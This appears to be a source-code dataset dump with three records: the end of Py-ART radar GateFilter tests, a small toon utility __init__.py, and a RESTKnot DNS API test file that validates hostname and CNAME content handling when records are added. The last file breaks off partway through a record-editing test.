assert gfilter.gate_excluded[0, 9] is np.False_
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_below('test_field', 0.5, op='or')
assert gfilter.gate_excluded[0, 0] is np.True_
assert gfilter.gate_excluded[0, 1] is np.False_
assert gfilter.gate_excluded[0, 9] is np.False_
gfilter.exclude_above('test_field', 8.5, op='new')
assert gfilter.gate_excluded[0, 0] is np.False_
assert gfilter.gate_excluded[0, 1] is np.False_
assert gfilter.gate_excluded[0, 9] is np.True_
def test_gatefilter_raises():
gfilter = pyart.correct.GateFilter(radar)
assert_raises(ValueError, gfilter.exclude_below, 'test_field', 0.5,
op='fuzz')
assert_raises(ValueError, gfilter.exclude_below, 'test_field', 0.5,
exclude_masked='fuzz')
#################
# include tests #
#################
def test_gatefilter_gate_included_attribute():
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_below('test_field', 0.5, op='or')
assert gfilter.gate_excluded[0, 0] is np.True_
assert gfilter.gate_excluded[0, 1] is np.False_
assert gfilter.gate_included[0, 0] is np.False_
assert gfilter.gate_included[0, 1] is np.True_
def test_gatefilter_include_below():
gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
gfilter.include_below('test_field', 5)
assert gfilter.gate_included[0, 0] is np.True_
assert gfilter.gate_included[0, -1] is np.False_
gfilter.include_below('test_field', 99)
assert gfilter.gate_included[0, 0] is np.True_
assert gfilter.gate_included[0, -1] is np.True_
def test_gatefilter_include_above():
gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
gfilter.include_above('test_field', 5)
assert gfilter.gate_included[0, 0] is np.False_
assert gfilter.gate_included[0, -1] is np.True_
gfilter.include_above('test_field', -5)
assert gfilter.gate_included[0, 0] is np.True_
assert gfilter.gate_included[0, -1] is np.True_
def test_gatefilter_include_inside():
gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
gfilter.include_inside('test_field', 2, 5)
assert gfilter.gate_included[0, 0] is np.False_
assert gfilter.gate_included[0, 3] is np.True_
assert gfilter.gate_included[0, -1] is np.False_
gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
gfilter.include_inside('test_field', 5, 2)
assert gfilter.gate_included[0, 0] is np.False_
assert gfilter.gate_included[0, 3] is np.True_
assert gfilter.gate_included[0, -1] is np.False_
def test_gatefilter_include_outside():
gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
gfilter.include_outside('test_field', 2, 5)
assert gfilter.gate_included[0, 0] is np.True_
assert gfilter.gate_included[0, 3] is np.False_
assert gfilter.gate_included[0, -1] is np.True_
gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
gfilter.include_outside('test_field', 5, 2)
assert gfilter.gate_included[0, 0] is np.True_
assert gfilter.gate_included[0, 3] is np.False_
assert gfilter.gate_included[0, -1] is np.True_
def test_gatefilter_include_equal():
gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
gfilter.include_equal('test_field', 2)
assert gfilter.gate_included[0, 2] is np.True_
assert gfilter.gate_included[0, 3] is np.False_
def test_gatefilter_include_not_equal():
gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
gfilter.include_not_equal('test_field', 2)
assert gfilter.gate_included[0, 2] is np.False_
assert gfilter.gate_included[0, 3] is np.True_
def test_gatefilter_include_all():
gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
gfilter.include_all()
assert np.all(gfilter.gate_included == np.True_)
def test_gatefilter_include_none():
gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
gfilter.include_none()
assert np.all(gfilter.gate_included == np.False_)
def test_gatefilter_include_masked():
gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
gfilter.include_not_masked('test_field2')
assert gfilter.gate_included[0, 0] is np.True_
assert gfilter.gate_included[2, 2] is np.False_
assert gfilter.gate_included[3, 3] is np.True_
assert gfilter.gate_included[4, 4] is np.True_
assert gfilter.gate_included[5, 5] is np.True_
def test_gatefilter_include_valid():
gfilter = pyart.correct.GateFilter(radar, exclude_based=False)
gfilter.include_valid('test_field2')
assert gfilter.gate_included[0, 0] is np.True_
assert gfilter.gate_included[2, 2] is np.False_
assert gfilter.gate_included[3, 3] is np.False_
assert gfilter.gate_included[4, 4] is np.False_
assert gfilter.gate_included[5, 5] is np.False_
def test_gatefilter_include_gates():
gfilter = pyart.correct.GateFilter(radar)
gfilter.exclude_all()
gates = gfilter.gate_included
gates[2,0] = np.True_
gates[2,2] = np.True_
gfilter.include_gates(gates)
# include when excluded
assert gfilter.gate_included[0, 0] is np.False_
assert gfilter.gate_included[2, 0] is np.True_
# include when already included
gfilter.include_gates(gates)
assert gfilter.gate_included[2, 0] is np.True_
gates[2,0] = np.False_
gates[0,2] = np.True_
# include with op='or'
gfilter.include_gates(gates, op='or')
assert gfilter.gate_included[2, 0] is np.False_
assert gfilter.gate_included[0, 2] is np.False_
assert gfilter.gate_included[2, 2] is np.True_
| 36.824675 | 71 | 0.726503 | 1,730 | 11,342 | 4.527746 | 0.050867 | 0.15307 | 0.221371 | 0.191498 | 0.902592 | 0.898123 | 0.860207 | 0.80429 | 0.709434 | 0.698072 | 0 | 0.03146 | 0.159231 | 11,342 | 307 | 72 | 36.944625 | 0.789954 | 0.020631 | 0 | 0.598291 | 0 | 0 | 0.035449 | 0 | 0 | 0 | 0 | 0 | 0.470085 | 1 | 0.111111 | false | 0 | 0.012821 | 0 | 0.123932 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
1153c10c4ff1118cb982ae484dcadecf1eeabd05 | 90 | py | Python | toon/util/__init__.py | aforren1/peacoat | 73c4c8f3fe429de262d32948ee43f2d5dde05570 | [
"MIT"
] | null | null | null | toon/util/__init__.py | aforren1/peacoat | 73c4c8f3fe429de262d32948ee43f2d5dde05570 | [
"MIT"
] | 64 | 2017-06-11T21:18:12.000Z | 2021-11-09T15:48:04.000Z | toon/util/__init__.py | aforren1/toon | 73c4c8f3fe429de262d32948ee43f2d5dde05570 | [
"MIT"
] | null | null | null | from toon.util.priority import priority
from toon.util.clock import MonoClock, mono_clock
| 30 | 49 | 0.844444 | 14 | 90 | 5.357143 | 0.571429 | 0.213333 | 0.32 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 90 | 2 | 50 | 45 | 0.925926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3a1e51960890065384293f367bc798800f3857e3 | 65,794 | py | Python | api/test/test_validation.py | riszkymf/RESTKnot | 2788e0cce127e6d66fdb72e81b31a983e89979d2 | [
"MIT"
] | null | null | null | api/test/test_validation.py | riszkymf/RESTKnot | 2788e0cce127e6d66fdb72e81b31a983e89979d2 | [
"MIT"
] | null | null | null | api/test/test_validation.py | riszkymf/RESTKnot | 2788e0cce127e6d66fdb72e81b31a983e89979d2 | [
"MIT"
] | null | null | null | import pytest
import json
import utils
class Vars:
ids = dict()
class DataTest(object):
identity = None
record_type = {
"soa" : "402140280385142785",
"srv" : "402329131320508417",
"a" : "402386688803307521",
"ns" : "402393625286410241",
"cname": "402427533112147969",
"mx" : "402427545745850369",
"aaaa": "402427683852124161",
"txt" : "402427759247851521"
}
def post_data(self,client,endpoint,data,headers):
url = 'api/'+endpoint
res = client.post(url,data=json.dumps(data),
content_type='application/json', headers=headers)
return res
def generate_empty_data(self):
self.identity = {
"zone": None,
"records": list(),
"content": list(),
"content_serial": list()
}
def add_zone(self,client,nm_zone,headers):
dataset = {}
url = 'user/dnscreate'
data = {"domain": nm_zone}
res = self.post_data(client,url,data,headers)
tmp = json.loads(res.data.decode('utf8'))
if str(tmp['code']) == '200':
dataset['id_zone'] = tmp['data']['data']['id_zone']
dataset['nm_zone'] = tmp['data']['data']['nm_zone']
elif str(tmp['code']) == '401':
where = {"nm_zone": nm_zone}
where = utils.get_model('where',where)
res = self.post_data(client,'zone',where,headers)
data = json.loads(res.data.decode('utf8'))
data = data['data'][0]
dataset['id_zone'] = data['id_zone']
dataset['nm_zone'] = nm_zone
if not self.identity:
self.generate_empty_data()
self.identity['zone'] = dataset
return res
def add_record(self,client,nm_record,type_,headers):
url = 'record'
id_type = self.record_type[type_.lower()]
data = {"id_zone": self.identity['zone']['id_zone'], "nm_record": nm_record, "id_type": id_type, "date_record": "2019220207"}
send_data = utils.get_model("add",data)
res = self.post_data(client,url,send_data,headers)
id_record = json.loads(res.data.decode('utf8'))
try:
id_record = id_record['message']['id']
except Exception:
print(json.loads(res.data.decode('utf8')))
if not self.identity:
self.identity['records'].append(id_record)
return res
def add_content_data(self,client,content,id_record,headers):
dataset = dict()
endpoint = 'ttldata'
data = {"id_record" : id_record, "id_ttl": "402428126292705281"}
json_send = utils.get_model("add",data)
res = self.post_data(client,endpoint,json_send,headers)
tmp = json.loads(res.data.decode('utf8'))
id_ttldata = tmp['message']['id']
endpoint = 'content'
data = {"id_ttldata": id_ttldata, "nm_content": content}
json_send= utils.get_model("add",data)
res = self.post_data(client,endpoint,json_send,headers)
tmp = json.loads(res.data.decode('utf8'))
id_content = tmp['message']['id']
dataset['id_ttldata'] = id_ttldata
dataset['id_content'] = id_content
dataset['id_record'] = id_record
try:
self.identity['content'].append(dataset)
except Exception:
if not self.generate_empty_data:
self.generate_empty_data()
self.identity['content'].append(dataset)
return dataset
def add_content_serial(self,client,content_serial,id_record,headers):
dataset = dict()
endpoint = 'content_serial'
data = {"id_record" : id_record, "nm_content_serial": content_serial}
json_send = utils.get_model('add',data)
res = self.post_data(client,endpoint,json_send,headers)
tmp = json.loads(res.data.decode('utf8'))
id_content_serial = tmp['message']['id']
dataset['id_content_serial'] = id_content_serial
dataset['id_record'] = id_record
try:
self.identity['content_serial'].append(dataset)
except Exception:
if not self.identity:
self.generate_empty_data()
self.identity['content_serial'].append(dataset)
return dataset
def add_error_record(self,client,nm_record,type_,headers):
url = 'record'
id_type = self.record_type[type_.lower()]
data = {"id_zone": self.identity['zone']['id_zone'], "nm_record": nm_record, "id_type": id_type, "date_record": "2019220207"}
send_data = utils.get_model("add",data)
res = self.post_data(client,url,send_data,headers)
return res
def edit_content_data(self,client,id_content,id_record,new_content,headers):
fields = {"fields": {"nm_content": new_content}}
tags = {"tags":{"id_content": id_content}}
send_data = {"edit": {**fields, **tags}}
res = self.post_data(client,'content',send_data,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = self.post_data(client,'sendcommand',data,headers)
return res
def edit_ttldata(self,client,id_ttldata,new_ttl,id_record,headers):
fields = {"fields": {"id_ttl": new_ttl,"id_record": id_record}}
tags = {"tags": {"id_ttldata": id_ttldata}}
send_data = {"edit": {**fields, **tags}}
res = self.post_data(client,'ttldata',send_data,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = self.post_data(client,'sendcommand',data,headers)
return res
def edit_record(self,client,id_record,new_data,headers):
fields = {
"nm_record": new_data["nm_record"],
"date_record": new_data["date_record"],
"id_zone": new_data["id_zone"],
"id_type": new_data["id_type"]
}
fields = {"fields" : fields}
tags = {"tags": {"id_record": id_record}}
send_data = {"edit": {**fields, **tags}}
res = self.post_data(client,'record',send_data,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = self.post_data(client,'sendcommand',data,headers)
return res
def edit_serial_data(self,client,headers,id_content_serial,id_record,new_content_serial):
fields = { "nm_content_serial": new_content_serial}
fields = {"fields" : fields}
tags = {"tags": {"id_content_serial": id_content_serial}}
send_data = {"edit": {**fields, **tags}}
res = self.post_data(client,'content_serial',send_data,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = self.post_data(client,'sendcommand',data,headers)
return res
def teardown(self,client,headers):
id_zone = self.identity['zone']['id_zone']
id_records = self.identity['records']
for i in id_records:
data = {"cluster-unset-master": {"tags": {"id_zone" : str(id_zone)}}}
self.post_data(client,'sendcommand',data,headers)
data = {"cluster-unset-slave": {"tags": {"id_zone" : str(id_zone)}}}
self.post_data(client,'sendcommand',data,headers)
data = {"conf-unset":{"tags":{"id_zone" : id_zone}}}
self.post_data(client,'sendcommand',data,headers)
data = {'id_zone': id_zone}
send_data = utils.get_model('remove',data)
self.post_data(client,'zone',send_data,headers)
def add_content_data_fail(self,client,content,id_record,headers):
dataset = dict()
endpoint = 'ttldata'
data = {"id_record" : id_record, "id_ttl": "402428126292705281"}
json_send = utils.get_model("add",data)
res = self.post_data(client,endpoint,json_send,headers)
tmp = json.loads(res.data.decode('utf8'))
id_ttldata = tmp['message']['id']
endpoint = 'content'
data = {"id_ttldata": id_ttldata, "nm_content": content}
json_send= utils.get_model("add",data)
res = self.post_data(client,endpoint,json_send,headers)
tmp = json.loads(res.data.decode('utf8'))
assert tmp['status'] == 'error'
def add_content_serial_fail(self,client,content_serial,id_record,headers):
endpoint = 'content_serial'
data = {"id_record": id_record,"nm_content_serial":content_serial}
json_send = utils.get_model("add",data)
res = self.post_data(client,endpoint,json_send,headers)
tmp = json.loads(res.data.decode('utf8'))
assert tmp['status'] == 'error'
def teardown_record(self,client,id_record,headers):
data = {"zone-unset":{"tags":{"id_record" : id_record}}}
self.post_data(client,'sendcommand',data,headers)
data = {"id_record": id_record}
data = utils.get_model("remove",data)
self.post_data(client,'record',data,headers)
class TestValidation:
testset = list()
def post_data(self,client,endpoint,data,headers):
url = 'api/'+endpoint
res = client.post(url,data=json.dumps(data),
content_type='application/json', headers=headers)
return res
def assert_hostname(self,respons,expected,zone):
result_ = json.loads(respons.data.decode('utf8'))
try:
result = result_['data']['data']
except Exception:
print(result_)
zn_knot = zone+"."
hostnames = list(result[zn_knot].keys())
assert expected in hostnames
return result[zn_knot][expected]
def assert_error(self,respons,expected,zone):
result = json.loads(respons.data.decode('utf8'))
def assert_value(self,respons,expected,record_type):
try:
data = respons[record_type.upper()]
except Exception:
data = respons[record_type.lower()]
data = data['data']
assert expected in data
def test_validation_hostname(self,client,get_header):
####################### CNAME ######################
record_type = 'cname'
headers = get_header
test_data = DataTest()
self.testset.append(test_data)
res = test_data.add_zone(client,"wetestzone.xyz",headers)
assert res.status_code == 200
########## hostname : @ , content: wetestzone.xyz
res = test_data.add_record(client,"@",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'wetestzone.xyz',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,'wetestzone.xyz.',nm_zone)
self.assert_value(respons,'wetestzone.xyz.wetestzone.xyz.',record_type)
test_data.teardown_record(client,id_record,headers)
############## hostname : wetestzone.xyz , content : wetestzone.xyz.
res = test_data.add_record(client,"wetestzone.xyz",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'wetestzone.xyz.',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
res=self.assert_hostname(res,'wetestzone.xyz.wetestzone.xyz.',nm_zone)
self.assert_value(res,'wetestzone.xyz.',record_type)
data = {"zone-unset":{"tags":{"id_record" : id_record}}}
self.post_data(client,'sendcommand',data,headers)
data = {"id_record": id_record}
data = utils.get_model("remove",data)
res=self.post_data(client,'record',data,headers)
test_data.teardown_record(client,id_record,headers)
# ##### hostname : www , content: @
# res = test_data.add_record(client,"www",record_type,headers)
# assert res.status_code == 200
# res = json.loads(res.data.decode('utf8'))
# id_record = res['message']['id']
# res = test_data.add_content_data(client,'@',id_record,headers)
# data = {"zone-insert": {"tags":{"id_record": id_record}}}
# res = test_data.post_data(client,'sendcommand',data,headers)
# res = json.loads(res.data.decode('utf8'))
# # ZONE READ
# id_zone = test_data.identity['zone']['id_zone']
# data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
# res = test_data.post_data(client,'sendcommand',data,headers)
# nm_zone = test_data.identity['zone']['nm_zone']
# res=self.assert_hostname(res,'www.wetestzone.xyz.',nm_zone)
# self.assert_value(res,'wetestzone.xyz.',record_type)
# test_data.teardown_record(client,id_record,headers)
##### hostname : a.b.c content: mail.google.com
res = test_data.add_record(client,"a.b.c",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'mail.google.com',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
res=self.assert_hostname(res,'a.b.c.wetestzone.xyz.',nm_zone)
self.assert_value(res,'mail.google.com.wetestzone.xyz.',record_type)
test_data.teardown_record(client,id_record,headers)
##### hostname : a.b.c content: mail.google.com
res = test_data.add_record(client,"a.b.c",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'mail.google.com',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
res=self.assert_hostname(res,'a.b.c.wetestzone.xyz.',nm_zone)
self.assert_value(res,'mail.google.com.wetestzone.xyz.',record_type)
test_data.teardown_record(client,id_record,headers)
##### hostname : A-0c content: mail.google.com.
res = test_data.add_record(client,"a-0c",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'mail.google.com.',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
res=self.assert_hostname(res,'a-0c.wetestzone.xyz.',nm_zone)
self.assert_value(res,'mail.google.com.',record_type)
test_data.teardown_record(client,id_record,headers)
##### hostname : 0--0 content: mail.google.com.
res = test_data.add_record(client,"0--0",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'store.cobadns08.xyz',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
res=self.assert_hostname(res,'0--0.wetestzone.xyz.',nm_zone)
self.assert_value(res,'store.cobadns08.xyz.wetestzone.xyz.',record_type)
test_data.teardown_record(client,id_record,headers)
########## hostname : @ , content: store.cobadns08.xyz.
res = test_data.add_record(client,"@",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'store.wetestzone.xyz.',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,'wetestzone.xyz.',nm_zone)
self.assert_value(respons,'store.wetestzone.xyz.',record_type)
test_data.teardown_record(client,id_record,headers)
########## hostname : @ , content: abc.wetestzone.xyz
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'abc.wetestzone.xyz'
expected_content_value = 'abc.wetestzone.xyz.wetestzone.xyz.'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content_value,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_value,record_type)
test_data.teardown_record(client,id_record,headers)
########## hostname : @ , content: a.b.c.wetestzone.xyz.
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'abc.wetestzone.xyz.'
expected_content_value = 'abc.wetestzone.xyz.'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content_value,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_value,record_type)
test_data.teardown_record(client,id_record,headers)
########## hostname : @ , content: a.b.c.wetestzone.xyz.
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'abc.wetestzone.xyz.'
expected_content_value = 'abc.wetestzone.xyz.'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content_value,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_value,record_type)
test_data.teardown_record(client,id_record,headers)
########## hostname : @ , content: mail
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'mail'
expected_content_value = 'mail.wetestzone.xyz.'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content_value,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_value,record_type)
test_data.teardown_record(client,id_record,headers)
########## hostname : @ , content: A-0c
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'A-0c'
expected_content_value = 'a-0c.wetestzone.xyz.'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content_value,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_value,record_type)
test_data.teardown_record(client,id_record,headers)
########## hostname : @ , content: o12345670123456701234567012345670123456701234567012345670123456
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'o12345670123456701234567012345670123456701234567012345670123456'
expected_content_value = 'o12345670123456701234567012345670123456701234567012345670123456.wetestzone.xyz.'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content_value,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_value,record_type)
test_data.teardown_record(client,id_record,headers)
########## FAILURE hostname : @ , content: -A0c
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = '-A0c'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
########## FAILURE hostname : @ , content: A0c-
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'A0c-'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
########## FAILURE hostname : @ , content: A.-0c
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'A.-0c'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
########## FAILURE hostname : @ , content: A-.0c
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'A-.0c'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
########## FAILURE hostname : @ , content: o123456701234567012345670123456701234567012345670123456701234567
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'o123456701234567012345670123456701234567012345670123456701234567'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
########## FAILURE hostname : www.
hostname_ = 'www.'
expected_hostname = 'wetestzone.xyz.'
content_value = 'o123456701234567012345670123456701234567012345670123456701234567'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : mail.cobadns08.xyz.
hostname_ = 'mail.cobadns08.xyz.'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : *
hostname_ = '*'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : -A0c
hostname_ = '-A0c'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : A0c-
hostname_ = '-A0c-'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : A.-0c
hostname_ = 'A.-0c'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : A-.0c
hostname_ = 'A-.0c'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : o123456701234567012345670123456701234567012345670123456701234567
hostname_ = 'o123456701234567012345670123456701234567012345670123456701234567'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## hostname : @ , content: a.b.c.wetestzone.xyz. EDITING RECORD
hostname_ = '@'
expected_hostname = 'test.wetestzone.xyz.'
content_value = 'abc.wetestzone.xyz.'
expected_content_value = 'bvrtan.wetestzone.xyz.'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content_value,id_record,headers)
id_content = res['id_content']
id_ttldata = res['id_ttldata']
data = {"zone-insert": {"tags":{"id_record": id_record}}}
